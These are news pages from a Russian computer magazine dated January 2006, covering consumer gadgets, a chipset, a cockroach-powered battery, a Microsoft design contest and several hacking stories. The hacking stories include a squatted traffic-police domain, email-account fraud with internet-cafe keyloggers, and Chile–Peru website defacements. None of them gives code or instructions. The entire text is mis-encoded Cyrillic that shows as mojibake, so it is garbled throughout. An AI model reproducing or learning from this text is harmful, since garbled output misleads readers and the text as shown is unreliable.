êîòîðûé ðàñïîëîæåí íà áîêîâîé ñòåíêå (â îáåèõ êîëîíêàõ áàñîâèêè îðèåíòèðîâàíû âíóòðü ñòåðåîáàçû). Ìîùíîñòü âñòðîåííîãî óñèëèòåëÿ ñîñòàâëÿåò 40 Âò íà êàíàë (RMS), à îðãàíû óïðàâëåíèÿ ðàñïîëîæåíû â ñïåöèàëüíîì óãëóáëåíèè íà âíåøíåé áîêîâîé. Òóò íàõîäèòñÿ òåìáðîáëîê (Í× è Â×), à òàêæå ðåãóëÿòîðû ãðîìêîñòè è ýõî ñèãíàëà ñ îáîèõ ìèêðîôîííûõ âõîäîâ, êîòîðûå òàêæå ðåàëèçîâàíû â D90. Âíåøíÿÿ îòäåëêà ñîñòîèò èç ÷åðíûõ ëàêèðîâàííûõ ïåðåäíèõ ïàíåëåé, êîðïóñ âûïîëíåí â ñòèëå «ïîä òåìíîå äåðåâî», äîïîëíÿþò êàðòèíêó ëàêèðîâàííûé ïîäèóì è ñòèëüíûå îïîðû.

ÃÓÁÎØËÅÏ Íà ïðèëàâêàõ ÿïîíñêèõ ìàãàçèíîâ íåäàâíî ïîÿâèëàñü âåñüìà îðèãèíàëüíàÿ ãàðíèòóðà, ñäåëàííàÿ â ôîðìå ìóëüòÿøíûõ ãóá, çàêðåïëåííûõ íà îêðóãëåííîé ïîäñòàâêå. Âåñü êàéô óñòðîéñòâà ñîòîèò â òîì, ÷òî êîãäà âî âðåìÿ ðàçãîâîðà òû áóäåøü ñëûøàòü ñîáåñåäíèêà, äåâàéñ áóäåò äâèãàòü ãóáàìè, ñòàðàÿñü òî÷íî ïîïàäàòü â òàêò åãî ðå÷è. Íà âûáîð ïðåäëàãàþòñÿ óñòðîéñòâà òðåõ öâåòîâ: êðàñíûå ñ áåëîé ïîìàäîé, ÷åðíûå — ñ êðàñíîé è ñåðåáðèñòûå — ñ ãîëóáîé. Ãàðíèòóðó ìîæíî ïîäêëþ÷èòü ê êîìïüþòåðó èëè êîìïüþòåð — ÷åðåç USB, à åñëè ìîáèëüíèê íå îáîðóäîâàí äàííûì ðàçúåìîì, òî ìîæíî îáîéòèñü è ñòàíäàðòíûì jack. Êîíå÷íî, íå ñîâñåì ïîíÿòíî, çà÷åì ïîäêëþ÷àòü ýòî óñòðîéñòâî ê ìîáèëüíèêó, à âîò íà ðàáî÷åì ñòîëå îíî áóäåò ñìîòðåòüñÿ áîëåå ÷åì ñòèëüíî. Òàêæå äåâàéñ ìîæåò ðàáîòàòü è â êà÷åñòâå àêóñòèêè, îäíàêî íå ñàìîãî ëó÷øåãî êà÷åñòâà.

8

ÏÎÄÀÐÈ ÑÅÁÅ PHILIPS

Ïðàçäíèêè êîí÷èëèñü, òû ïîäàðèë âñåì ïîäàðêè? Åñëè äà, òî î÷åíü õîðîøî. Íó à åñëè êîãî-òî çàáûë, êòî-òî áûë â îòúåçäå? Êñòàòè, à ñåáÿòî òû íå çàáûë? Åñëè âäðóã ïðîèçîøåë òàêîé êàçóñ, òî òû ìîæåøü íàâåðñòàòü óïóùåííîå: êîìïàíèÿ Philips âûïóñòèëà íîâûé DVD-ðåêîðäåð DVDR 3330 H, êîòîðûé ñòàíåò îòëè÷íûì ïîäàðêîì äëÿ âñåõ. Äîñòàòî÷íî ïîäêëþ÷èòü åãî ê òåëåâèçîðó, è òû çàáóäåøü î ìíîãèõ ïðîáëåìàõ: òåïåðü íåâàæíî äîìà òû èëè íåò, íî ëþáèìûé ôèëüì èëè ïåðåäà÷ó ïðîïóñòèòü áóäåò çàòðóäíèòåëüíî áëàãîäàðÿ ïëàíèðîâêè çàïèñè. Ñ çàïèñüþ ñâÿçàíû è äðóãèå âîçìîæíîñòè: ïðîñìîòð íà÷àëà ïåðåäà÷è (ïîêà êîíåö åùå ïèøåòñÿ), àâòîìàòè÷åñêîå âêëþ÷åíèå çàïèñè ïî ðàñïèñàíèþ, âîñïðîèçâåäåíèå ïîíðàâèâøèõñÿ ñöåí âî âðåìÿ çàïèñè è òàê äàëåå. Áëàãîäàðÿ èíòåðôåéñó i.Link ìîæíî äåëàòü çàïèñè ñ öèôðîâîé âèäåîêàìåðû. Êñòàòè, à íà ÷òî çàïèñûâàåì? Îòâåò ïðîñò è ïðèÿòåí – íà âñòðîåííûé 160 Ãá æåñòêèé äèñê! Òàê ÷òî ìåñòà âñåì õâàòèò. Íî ýòî íå òîëüêî ðåêîðäåð, íî è ïëååð, êîòîðûé ðàáîòàåò ñ öåëîé êó÷åé ôîðìàòîâ: DVD, DVD+R/RW, DVD-R/RW, (S)VCD, JPEG,CD,CD-R/RW è MP3-CD. Ïðèÿòíîãî ïðîñìîòðà! XÀÊÅÐ 01 /85/ 06


][NEWS

Ó ÃÀÈØÍÈÊΠÑÏÅÐËÈ ÄÎÌÅÍ Çàáàâíûé ñëó÷àé ïðîèçîøåë â ãîðîäå Òîëüÿòòè. Àäìèí ñàéòà www.gaitlt.ru, ïðèíàäëåæàùåãî ìåñòíîìó ÃÀÈ, çàáûë ïðîïëàòèòü äîìåí, è ýòèì òóò æå âîñïîëüçîâàëèñü äîáëåñòíûå êèáåðñêâîòòåðû. Àäðåñ áûë çàðåãàí íà íîâîãî âëàäåëüöà, è íà èíäåêñíîé ñòðàíè÷êå ïîÿâèëàñü êðàñî÷íàÿ íàäïèñü: «Ïðîäàåööî». Ãàèøíèêè îò òàêîé íàãëîñòè, êîíå÷íî, îôèãåëè, íî ïîëîñàòîé ïàëî÷êîé âåäü ñåòåâûõ àêóë íå îáðàçóìèøü. Ïîýòîìó ðåøèëè ïîéòè ïî ëåãêîìó ïóòè. Îíè ïðîñòî çàðåãàëè íîâûé ñàéò ñ ïîõîæèì íàçâàíèåì — www.tltgai.ru — è âîññòàíîâèëè òàì âåñü ñòàðûé êîíòåíò. ß ïîêà ïèñàë íîâîñòü, äàæå ïðèäóìàë íîâûå íàçâàíèÿ äëÿ ñàéòîâ, íà ñëó÷àé, åñëè óãîíÿò è ýòîò: www.tlt.gai.ru, www.gai-tlt.ru, www.donthackusplease.tltgai.ru. Ïîëüçóéòåñü, òîâàðèùè ãàèøíèêè :).

][NEWS

Õàêåðñêèå íàïàäêè íà âàæíûå ñåòåâûå ðåñóðñû àìåðèêàíñêîãî ïðàâèòåëüñòâà ïðîäîëæàþòñÿ, è â ïîñëåäíåå âðåìÿ òîëüêî ó÷àñòèëèñü. Êòî çà íèìè ñòîèò? Êåâèí Ìèòíèê? Óñàìà áåí Ëàäåí? «Íåò!» — ïåðå÷åðêèâàåò ãëàâíûõ ïîäîçðåâàåìûõ ïîìîùíèê äèðåêòîðà ÔÁÐ Ëóèñ Ðåéãåë. «Ýòî ïðàâèòåëüñòâà äðóãèõ ñòðàí!». Êîíå÷íî, íå òîëüêî âëàñòè ìîãóò áûòü çàèíòåðåñîâàíû â ïåðåäîâûõ ðàçðàáîòêàõ àìåðèêàíñêèõ ó÷åíûõ, íî òîëüêî ó âëàñòåé åñòü âîçìîæíîñòè èíèöèèðîâàòü êà÷åñòâåííûå âçëîìû çàùèùåííûõ ñèñòåì. «Ãîðàçäî äåøåâëå äëÿ ñòðàíû îðãàíèçîâàòü êðàæó èíôîðìàöèè ÷åðåç Èíòåðíåò è èñïîëüçîâàòü åå äëÿ ðàçâèòèÿ òåõíîëîãèé, íà ñîçäàíèå êîòîðûõ ó ÑØÀ óøëè äåñÿòèëåòèÿ», — îáúÿñíèë Ðåéãåë. «Ó íàñ íåò óëèê, íî ó íàñ åñòü ïîäîçðåíèÿ, è ýòî óæå íåìàëî!» — ðåçþìèðîâàë îí æå. ÔÁÐ, ñóäÿ ïî âñåìó, íå ÷èòàåò íîâîñòåé, èíà÷å áû çíàëî, ÷òî â íàó÷íûõ ñåòÿõ NASA îðóäóþò äåñÿòêè íåñîâåðøåííîëåòíèõ ñêðèïòêèäèñîâ, êîòîðûì íå íóæíû ñðåäñòâà ïðàâèòåëüñòâà äëÿ ïîäáîðà íóæíîãî ýêñïëîéòà.  îáùåì, òðåâîæíûå ñåãîäíÿ âðåìåíà. Âäðóã çàâòðà ÑØÀ ðåøèò, ÷òî ýòî Ðîññèéñêîå ïðàâèòåëüñòâî êîâûðÿåòñÿ â êîìïüþòåðàõ Ïåíòàãîíà? Ñëîâî çà ñëîâî, è ìîæåò ïðîèçîéòè Òðåòüÿ ìèðîâàÿ.

ÇÄÐÀÂÑÒÂÓÉ, ÑÛÍÎÊ. ÂÛØËÈ ÄÅÍÅÃ

ÀÍÒÈÕÀÊÅÐÑÊÈÉ ×ÈÏ

Íà íåäàâíåé âñòðå÷å ñ ïðåäñòàâèòåëÿìè ïðåññû è êîìïüþòåðíîé ìîëîäåæüþ êîðïîðàöèÿ Intel ïîäåëèëàñü èíôîðìàöèåé î ñâîèõ áóäóùèõ ïðîåêòàõ. Ñàìûì èíòåðåñíûì è ïåðñïåêòèâíûì, ïîæàëóé, ÿâëÿåòñÿ íîâûé ÷èï, ðàçìåùàåìûé íà ìàòåðèíñêîé ïëàòå è îòñëåæèâàþùèé èçìåíåíèÿ â êîäå çàïóùåííûõ ïðîãðàìì. Ìíîãèå ñîâðåìåííûå ÷åðâè âîçäåéñòâóþò íà ïðîãðàììû â òðåå, íåðåäêî âñòàâëÿÿ â íèõ ñâîè ìîäóëè äëÿ ïîñëåäóþùåãî çàðàæåíèÿ. Ñåêóðíûé ÷èï Intel áûñòðî îáíàðóæèò òàêîå âìåøàòåëüñòâî è ïîäàñò ñèãíàë òðåâîãè, à äàëüøå àäìèí óæå ìîæåò îòêëþ÷èòü êîìï îò ñåòè è èñêàòü ëåêàðñòâî. Ìîæíî íàñòðîèòü, ÷òîáû ïðè òðåâîæíûõ ñèãíàëàõ ýòî äåëàëîñü àâòîìàòè÷åñêè. Òàê êàê äàëåêî íå âñå þçåðû óñòàíàâëèâàþò àíòèâèðè è ïðîòèâîøïèîíñêîå ÏÎ, âêëþ÷åíèå ÷èïà â ñòàíäàðòíóþ ñáîðêó PC îáåùàåò ïîâûñèòü çàùèùåííîñòü êîìïüþòåðîâ â öåëîì. Ïðåäñòàâèòåëè Intel ñîîáùèëè, ÷òî íå ïðåòåíäóþò ïîëíîñòüþ çàìåíèòü security-ñîôò, íî ñ÷èòàþò, ÷òî èõ ÷èï áóäåò îòëè÷íî äîïîëíÿòü äðóãèå ïðîãðàììû çàùèòû.

ÊÎÑÂÅÍÍÛÅ ÓËÈÊÈ

 íàøå âðåìÿ âñå çàðàáàòûâàþò, êàê ìîãóò. Ìîé ïîïóãàé÷èê òàíöóåò ëåçãèíêó çà ïðîñî. ß âîò, ÷òîáû êóøàòü, ïèøó âñÿêóþ õðåíü. À ìîëîäîé ïàðíèøêà èç Ñî÷è, èìÿ êîòîðîãî ìíå ïðèãðîçèëè íå íàçûâàòü, ñîçäàë ìûëüíûé áèçíåñ. Íåò, îí íå îòëàâëèâàë áåçäîìíûõ ñîáà÷åê, èç êîòîðûõ âàðèëè ìûëî. Îí ïðîñòî âçëàìûâàë ýëåêòðîííûå ïî÷òîâûå ÿùèêè è, ïðåäñòàâëÿÿñü ðîäñòâåííèêîì âëàäåëüöà, ïðîñèë äåíåã. «Çäðàâñòâóé ñûíîê, êàê äåëà, ðîäèìûé? Õîðîøî? À ÿ âîò â àâàðèþ ïîïàëà, 15 ïåðåëîìîâ òîëüêî íà ëåâîé íîãå.  îáùåì, íóæíû äåíüãè íà ëåêàðñòâà. Ïîìîæåøü? Îé, êàê ñëàâíî. Âîò òåáå ðåêâèçèòû. Æäó â äîëëàðàõ, ñðî÷íî. Öåëóþ, ìàìà». Íó, èëè ÷òî-òî â ýòîì äóõå. Ïðàâäà, äóðàêîâ íàõîäèëîñü íåìíîãî, ïîýòîìó ñî÷èíñêèé Áýíäåð ñòàë îñâàèâàòü èíòåðíåò-êàôåøêè. Îñòàâëÿë íà êîìïüþòåðå ñïåöèàëüíóþ ïðîãðàììó, ñ÷èòûâàþùóþ âñå ââåäåííûå ïàðîëè, ëîãèíû è íîìåðà áàíêîâñêèõ ñ÷åòîâ, è äàëüøå óæå äóìàë, ãäå ïîëó÷åííîå äîáðî èñïîëüçîâàòü. Ïðàâäà, ðàçáîãàòåòü íåçàäà÷ëèâûé áèçíåñìåí íå óñïåë. Ïàðíÿ âû÷èñëèëè ñîòðóäíèêè îòäåëà «Ê» è ïåðåäàëè äåëî â ñóä. Òåïåðü åìó ãðîçèò äî 5 ëåò òþðüìû.

×ÈËÈÉÑÊÈÅ ÕÀÊÅÐÛ ÎÁÚßÂÈËÈ ÏÅÐÓÀÍÑÊÈÌ ÂÎÉÍÓ Åñëè òû ðåãóëÿðíî ñìîòðèøü CNN, òî äîëæåí çíàòü, ÷òî ìåæäó ×èëè è Ïåðó ñåé÷àñ íàçðåë íåøóòî÷íûé êîíôëèêò. ×èëè âëàäååò 38 òûñÿ÷àìè êâàäðàòíûõ êèëîìåòðîâ ÷óäåñíûõ ðûáîïðîìûñëîâûõ âîä, è ñîñåäñòâóþùàÿ Ïåðó íàìåðåâàåòñÿ ïðèñâîèòü èõ ñåáå. Âîîáùå, ýòè äâà ãîñóäàðñòâà ïîñòîÿííî ñïîðÿò ïî ïîâîäó ñâîèõ òåððèòîðèé, íî ïîñÿãàòåëüñòâî íà ðûáîïðîìûñëîâóþ âîäó — óæå ñëèøêîì. Ïîñëåäíåé êàïëåé ñòàëè áåçóñïåøíûå ïîïûòêè ïîäåëèòü àâòîðñòâî íà ïîïóëÿðíûé ìåñòíûé àëêîãîëüíûé íàïèòîê «pisco» (íå ïóòàòü ñ ïèñüêîé). Ïîêà ïîëèòèêè, ïðåäñòàâëÿþùèå îáå ñòðàíû, ðâóò äî êðîâè äðóã äðóãó áðîâè, ïåðóàíñêèå õàêåðû ðåøèëè âçÿòü äåëî â ñâîè ðóêè. À èìåííî: ïðèíÿëèñü ëîìàòü ïðàâèòåëüñòâåííûå ñàéòû è îñòàâëÿòü íà íèõ ëîçóíãè â äóõå: «Îòäàéòå íàøó ðûáó! Ðóêè ïðî÷ü îò «ïèñêè»!». Íî âåäü è â ×èëè íå òîëüêî ôåðìåðû æèâóò. Íå äîëãî äóìàÿ, ÷èëèéñêèå õàêåðû õàêíóëè ñàéòû ïðàâèòåëüñòâà Ïåðó, ïîäïèñûâàÿ èõ: «Íå îòäàäèì íàøó ðûáó! È ïèñêó íàøó íå òðîíüòå!». Âîò òàêèå âîò ñòðàñòè êèïÿò íà ÷èëèéñêî-ïåðóàíñêèõ ïðîñòîðàõ. Âîïðîñ, ÷åì âñå çàêîí÷èòñÿ, îñòàåòñÿ îòêðûòûì.

10

XÀÊÅÐ 01 /85/ 06


HARDNEWS

HARDNEWS

PRESTIGIO — ÝÒÎ ÏÐÅÑÒÈÆÍÎ

ÏÎËÍÛÉ USB ÎÒ SAMSUNG

Ñåìåéñòâî íîóòáóêîâ êîìïàíèè Prestigio, ðàññ÷èòàííûõ íà ðàáîòó â äîðîãå è èìåþùèõ äëÿ ýòîãî íåáîëüøèå ãàáàðèòû è âåñ, ïîïîëíèëîñü íîâîé ìîäåëüþ. Ýòî Visconte 1450W, òîíêèé è ñòèëüíûé ìîáèëüíûé ÏÊ, èìåþùèé õîðîøèå âîçìîæíîñòè, âûñîêóþ ïðîèçâîäèòåëüíîñòü è ìàññó èíòåðåñíûõ ôóíêöèé. Ñòîèò îí ÷óòü áîëåå òûñÿ÷è äîëëàðîâ. Ïîñòàâëÿåòñÿ ìîáèëüíûé ÏÊ â äâóõ îñíîâíûõ ìîäèôèêàöèÿõ: íà îñíîâå ïðîöåññîðà Intel Pentium M 7xx (1.60-2.0 ÃÃö, 533 ÌÃö FSB, 2 Ìá L2) ëèáî íà îñíîâå Intel Celeron M 3xx (1.30 ÃÃö è âûøå, 400 ÌÃö FSB, 512 Êá/1 Ìá, 90 íì) ñ ðàñøèðÿåìîé ïîääåðæêîé äî 2 Ãá ïàìÿòè. Ìîäåëè íà Pentium M ïîñòðîåíû íà ïëàòôîðìå Centrino âòîðîãî ïîêîëåíèÿ, ÷òî äàåò èì àäàïòåð Wi-Fi è 8êàíàëüíûé çâóêîâîé êîäåê. Ïîìèìî ýòîãî, âñå ìîäåëè îáëàäàþò øèðîêîôîðìàòíûì 14-äþéìîâûì ýêðàíîì è âñòðîåííîé âåá-êàìåðîé. Íî ýòî áîëüøå äëÿ ðàçâëå÷åíèé, à ñåðüåçíûå ãðàæäàíå îöåíÿò âñòðîåííûé Bluetooth-àäàïòåð, êàðäðèäåð, áîëüøîé íàáîð ïîðòîâ è 4,5 ÷àñà îáåùàííîé àâòîíîìíîé ðàáîòû. È íå çàáóäüòå ïðî ñòèëüíûé âíåøíèé âèä!

Ñåé÷àñ íà ðûíêå íàõîäèòñÿ ñòîëüêî ôëåø-ïëååðîâ, ÷òî òîëüêî î÷åíüî÷åíü ëåíèâûé ïðîèçâîäèòåëü íå èìååò â ñâîåì àðñåíàëå òàêîãî óñòðîéñòâà. Åñòåñòâåííî, ïðè òàêîì èçîáèëèè îáû÷íûì óñòðîéñòâîì íèêîãî íå óäèâèøü, ïîýòîìó âåíäîðû äîáàâëÿþò â ñâîè èçäåëèÿ ìàëåíüêèå, íî î÷åíü èíòåðåñíûå, ïîëåçíûå è óäîáíûå ôèøêè. Òàêèì óñòðîéñòâîì ÿâëÿåòñÿ mp3-ôëåø ïëååð Samsung YP-U1, êîòîðûé èìååò ïîëíîðàçìåðíûé âñòðîåííûé USB-ïîðò, ÷òî ïîçâîëÿåò åìó îáõîäèòüñÿ áåç íåóäîáíûõ ïðîâîäîâ-óäëèíèòåëåé. Ïðîñòî ïîäêëþ÷àåøü åãî ê USB-ïîðòó êîìïüþòåðà, è âñå – çàêà÷èâàé ìóçûêó. Âîò òàêàÿ âîò ôèøêà ó ýòîãî ïëååðà.  îñòàëüíîì îí òîæå íåïëîõ: ïîääåðæèâàåò ôîðìàòû MP3, OGG, ASF è WMA, ñèñòåìó çâó÷àíèÿ SRS WOW 3D.  ïðîäàæå åñòü ìîäåëè ñ åìêîñòüþ îò 256 Ìá äî 1 Ãá, êîòîðûå, ïî çàâåðåíèÿì ïðîèçâîäèòåëÿ, ìîãóò ðàáîòàòü îò àêêóìóëÿòîðà 13 ÷àñîâ. Ãàáàðèòû óñòðîéñòâà ñîñòàâëÿþò 23,8x87,8x13,5 ìì, à åãî âåñ – 30 ã.


HITECHNEWS

HITECHNEWS

ÍÀÑÒÎËÜÍÀß ÐÀÊÅÒÍÈÖÀ

ÌÍÎÃÎÏÎËÜÇÎÂÀÒÅËÜÑÊÎÅ ÏÎÐÍÎ

Èçâåñòíûé îíëàéíîâûé ìàãàçèí Marks & Spencer ïðåäëîæèë ñâîèì ïîêóïàòåëÿì âåñüìà îðèãèíàëüíûé USB-ãàäæåò, êîòîðûé ìîæåò ñòàòü íåïëîõèì ïîäàðêîì. Èãðóøêà ïðåäñòàâëÿåò ñîáîé ìèíèàòþðíóþ ðàêåòíóþ óñòàíîâêó, ðîëü ñíàðÿäîâ â êîòîðîé âûïîëíÿþò ñòèëèçîâàííûå ïîä ðàêåòû äðîòèêè. Åñëè íà êîìïüþòåð óñòàíîâèòü èäóùèé â êîìïëåêòå ñîôò, òî àðòèëëåðèåé ìîæíî áóäåò ïîëíîñòüþ óïðàâëÿòü ïðÿìî ñ ýêðàíà ìîíèòîðà. Äëÿ íàâåäåíèÿ íà öåëü óñòàíîâêà ìîæåò ïîâîðà÷èâàòüñÿ âîêðóã ñâîåé îñè è èçìåíÿòü óãîë àòàêè. Êîíå÷íî, òî÷íîñòü ïîïàäàíèÿ ïðèäåò íå ñðàçó, íî ïîñëå äîëæíîé òðåíèðîâêè äðîòèêè ìîæíî áóäåò ïðàêòè÷åñêè ñ ëþáîãî ðàññòîÿíèÿ îòïðàâëÿòü òî÷íî â ëîá çàçåâàâøåìóñÿ áîññó. Åñëè ïîäãîâîðèòü êîëëåã ïî ðàáîòå êóïèòü ñåáå òàêèå æå äåâàéñû, òî îôèñ ìîæíî áóäåò ìîìåíòàëüíî ïðåâðàòèòü â íàñòîÿùóþ çîíó âîåííûõ äåéñòâèé. Ê ñîæàëåíèþ, âìåñòå ñ óñòàíîâêîé ïîñòàâëÿåòñÿ âñåãî òðè äðîòèêà, êîòîðûå íàâåðíÿêà áûñòðî ïîòåðÿþòñÿ, îäíàêî âçàìåí ìîæíî áóäåò ïóñòèòü â õîä, ê ïðèìåðó, îñòðî çàòî÷åííûå êàðàíäàøè, åñëè ïðèäåëàòü ê íèì íåáîëüøîå îïåðåíèå. Åñëè òû óæå ìå÷òàåøü î ïîäîáíîì óñòðîéñòâå, òî áóäü ãîòîâ ñïèñàòü ñî ñâîåãî ñ÷åòà $35.

Ïîêà íåóãîìîííûå àìåðèêàíñêèå ïðàâîçàùèòíèêè è ïîëèòèêè ïûòàëèñü âñåìè ñèëàìè áîðîòüñÿ çà îãðàæäåíèå íåñîâåðøåííîëåòíèõ îò âñÿêèõ áåçîáèäíûõ èãð òèïà GTA è Doom, âíå èõ ïîëÿ çðåíèÿ îêàçàëñÿ êóäà áîëåå ñåðüåçíûé âðàã: ïåðâàÿ â ìèðå îíëàéíîâàÿ ìíîãîïîëüçîâàòåëüñêàÿ èãðà ñ îòêðîâåííûì ýðîòèêî-ïîðíîãðàôè÷åñêèì óêëîíîì Naughty America: The Game. Èíèöèàòîðîì äàííîãî ïðîåêòà âûñòóïèë äîâîëüíî èçâåñòíûé (â óçêèõ êðóãàõ) ïîðíîïîðòàë NaughtyAmerica.com. Ðàçðàáîòêà óæå ïðèáëèæàåòñÿ ê çàâåðøàþùåé ñòàäèè, è ðåëèç íàìå÷åí íà âåñíó ýòîãî ãîäà. Ïî ñóòè, èãðà ïðåäñòàâëÿåò ñîáîé îáûêíîâåííûé êëîí Sims, òîëüêî ïåðåíåñåííûé â îíëàéí è ïåðåäåëàííûé ïîä òåìàòèêó íî÷íîé æèçíè. Âíà÷àëå èãðîêó ïðåäëàãàåòñÿ ñîçäàòü ñîáñòâåííîãî ïåðñîíàæà (òåëî, ëèöî, öâåò êîæè, ïðè÷åñêà è òàê äàëåå).  äàëüíåéøåì â ðàñïîðÿæåíèè èãðîêà áóäóò âñåâîçìîæíûå íî÷íûå êëóáû, êàçèíî, áàðû, îòåëè, ñåêñ-øîïû è ïðî÷èå çëà÷íûå ìåñòà, ãäå ìîæíî çíàêîìèòüñÿ ñ äðóãèìè èãðîêàìè è ó÷àñòâîâàòü â ðàçíûõ ìèíè-èãðàõ (îïÿòü æå ýðîòè÷åñêîãî ñîäåðæàíèÿ). Õîòÿ âñå ýòî — ëèøü ïðåëþäèÿ ê ãëàâíîìó ðåæèìó èãðû. Âåäü äëÿ ïîëíîãî ïîãðóæåíèÿ â ïðîöåññ ìîæíî áóäåò äàæå àêòèâèðîâàòü ðåæèì âåáêàìåðû. Êàê íè ñòðàííî, äàæå ñàìûå ÿðûå áîðöû çà ÷èñòîòó äåòñêèõ íðàâîâ ïîêà íèêàê íå êîììåíòèðóþò äàííóþ èãðó (ñêîðåå âñåãî, ó íèõ îò óäèâëåíèÿ ïðîèçîøëî íåêîå ïîäîáèå ïåðåïîëíåíèÿ áóôåðà).

VIA ÁÎÐÅÒÑß ÇÀ ËÈÄÅÐÑÒÂÎ Êîðïîðàöèÿ VIA àêòèâíî âîçâðàùàåòñÿ íà ðûíîê ÷èïñåòîâ. Íåäàâíî îíà íà÷àëà îòãðóæàòü âåíäîðàì ÍÌÑ K8T900, ïðåäíàçíà÷åííûé äëÿ ñîçäàíèÿ ñèñòåìíûõ ïëàò äëÿ ïðîöåññîðîâ Athlon 64 è ïîääåðæêè ãðàôè÷åñêèõ ðåøåíèé, èñïîëüçóþùèõ íåñêîëüêî ãðàôè÷åñêèõ àäàïòåðîâ. Êðîìå òîãî, â VIA K8T900 áóäåò ñóùåñòâîâàòü ïîëíàÿ ïîääåðæêà ãðàôè÷åñêèõ ðåøåíèé êîìïàíèè S3 Graphics – Chrome S27 è òåõíîëîãèè MultiChrome (àíàëîã ATI CrossFire è nVidia SLI). Ýòî ÷èï S3, ðàññ÷èòàííûé íà ïëàòû ñðåäíåãî öåíîâîãî ñåãìåíòà. Åñëè òû ïîêà òî÷íî íå ðåøèë, ÷òî áóäåøü èñïîëüçîâàòü ýòè äåâàéñû, òî òåáå ïîíðàâèòñÿ ïîääåðæêà â ýòîì ÷èïñåòå áîëåå îáùèõ âåùåé, òàêèõ êàê øåñòü ïîðòîâ PCI Express x1, âñòðîåííàÿ àóäèîïëàòà VIA VinylAudio (âîñåìü êàíàëîâ) è ÷åòûðå ðàçúåìà SATA 3.0 Ãá/ñ. Ê ñîæàëåíèþ, åñëè òû íå âëàäååøü çàâîäîì ïî ïðîèçâîäñòâó ñèñòåìíûõ ïëàò, à ïîêà ýòè ÷èïñåòû ïîñòàâëÿþòñÿ òîëüêî òóäà, òî òû ñìîæåøü íàñëàäèòüñÿ åãî âîçìîæíîñòÿìè òîëüêî â 1 êâàðòàëå ýòîãî ãîäà. Óæå â âèäå ïîëíîöåííîé ïëàòû.

ÎÄÍÀ ÒÀÐÀÊÀÍÜß ÑÈËÀ

Ôðàéñêî Ëîïåç, ó÷åíûé èç Óíèâåðñèòåòà Ôèòè, ñîâìåñòíî ñî ñâîèìè

ñòóäåíòàìè íåäàâíî ïðîäåìîíñòðèðîâàë ðåçóëüòàòû ñâîåé ìíîãîëåòíåé íàó÷íîé ðàáîòû. Èì óäàëîñü îòûñêàòü ìåõàíèçì, ñ ïîìîùüþ êîòîðîãî ìîæíî ïðåîáðàçîâûâàòü áèîõèìè÷åñêóþ ýíåðãèþ â ýëåêòðè÷åñòâî. Ïî èòîãàì ìíîãî÷èñëåííûõ ýêñïåðèìåíòîâ áûëî âûÿâëåíî, ÷òî íàèëó÷øèõ ðåçóëüòàòîâ ìîæíî äîáèòüñÿ, èñïîëüçóÿ â êà÷åñòâå òîïëèâà, êàê íè óäèâèòåëüíî, ôåðìåíòû íàñåêîìûõ-âðåäèòåëåé (òàðàêàíû, ìîñêèòû è ïðî÷èå).  ñðåäíåì èç îäíîãî íàñåêîìîãî ìîæíî âûæàòü íàïðÿæåíèå îò 0,5 äî 1,25 âîëüòà, ïðè÷åì èç âñåõ âèäîâ èìåííî òàðàêàíû äåìîíñòðèðóþò îïòèìàëüíûå ïîêàçàòåëè. Ïîìèìî òåîðåòè÷åñêîãî èññëåäîâàíèÿ, áûë ðàçðàáîòàí è ïðîòîòèï òîïëèâíîãî ýëåìåíòà ïèòàíèÿ, êîòîðûé, ïî ñðàâíåíèþ ñ ïðîìûøëåííûìè àíàëîãàìè, èñïîëüçóåò àáñîëþòíî áåçîïàñíîå òîïëèâî è íå âðåäåí äëÿ îêðóæàþùåé ñðåäû. Âî âðåìÿ ýêñïåðèìåíòà îò äàííîé áàòàðåéêè óäàëîñü îäíîâðåìåííî ïîäçàðÿäèòü ëþìèíåñöåíòíóþ ëàìïó (12 Â) è íåáîëüøóþ ìèêðîâîëíîâêó (24 Â). Ïðàâäà, âîçíèêàåò äðóãîé âîïðîñ: ãäå òåïåðü âçÿòü ñòîëüêî âðåäèòåëåé? Âîçìîæíî, íåäàëåê òîò äåíü, êîãäà èõ áóäóò ïðîäàâàòü ìåøêàìè, à ïðèñóòñòâèå òàðàêàíîâ äîìà áóäåò ñ÷èòàòüñÿ áîëüøîé óäà÷åé.

12

XÀÊÅÐ 01 /85/ 06


HITECHNEWS

ÊÎÍÊÓÐÑ ÎÒ MICROSOFT

Äåëà ó íåáåçûçâåñòíîé êîðïîðàöèè Microsoft èäóò êàê íåëüçÿ ëó÷øå, íî ñ íîâàòîðñêèìè èäåÿìè ó íèõ íåáîëüøîé çàñòîé. Ïîõîæå, îáåùàííîé ðåâîëþöèè â Vista íå ïðîèçîéäåò, à òàê íåäàëåêî è äî îòòîêà ïîëüçîâàòåëåé íà äðóãèå ïëàòôîðìû. ×òîáû îñòàâàòüñÿ âñåãäà íà êîíå, êîìïàíèÿ ðåøèëà ïîïðîáîâàòü ïîäïèòàòüñÿ èäåÿìè îò ïðîñòûõ ïîëüçîâàòåëåé, äëÿ ÷åãî, ñîâìåñòíî ñ Industrial Designers of America (IDSA), ó÷ðåäèëà ñïåöèàëüíûé êîíêóðñ, êîòîðûé ïðîõîäèë ïîä ëîçóíãîì «ïåðåîñìûñëåíèå ðîëè ÏÊ íà áàçå Windows â æèçíè ëþäåé». Ëþáîé æåëàþùèé ìîã â ïåðèîä ñ 18 ìàÿ ïî 3 îêòÿáðÿ 2005 ãîäà ïðèñëàòü íà êîíêóðñ ñâîþ ðàáîòó, ãäå íàäî áûëî èçîáðàçèòü, êàêèì îí âèäèò êîìïüþòåð Windows â áóäóùåì. Èç âñåé ìàññû ðàáîò áóäåò âûáðàíî âñåãî òðè ïîáåäèòåëÿ, êîòîðûå áóäóò âûáèðàòüñÿ àâòîðèòåòíûì æþðè èç IDSA (íàãðàäà — 50 êèëîáàêñîâ), ïóáëè÷íûì ãîëîñîâàíèåì (25 êèëîáàêñîâ), ïëþñ ñïåöèàëüíûé ïðèç îò äÿäè Áèëëè (50 êèëîáàêñîâ). Íà äàííûé ìîìåíò ãîëîñîâàíèå óæå çàêîí÷åíî, à åãî îêîí÷àòåëüíûå èòîãè è âðó÷åíèå íàãðàä áóäóò ïîäâåäåíû â ÿíâàðå 2006 ãîäà íà âûñòàâêå CES â Ëàñ-Âåãàñå.

XÀÊÅÐ 01 /85/ 05

ÂÈÐÒÓÀËÜÍÀß ÃÈÒÀÐÀ

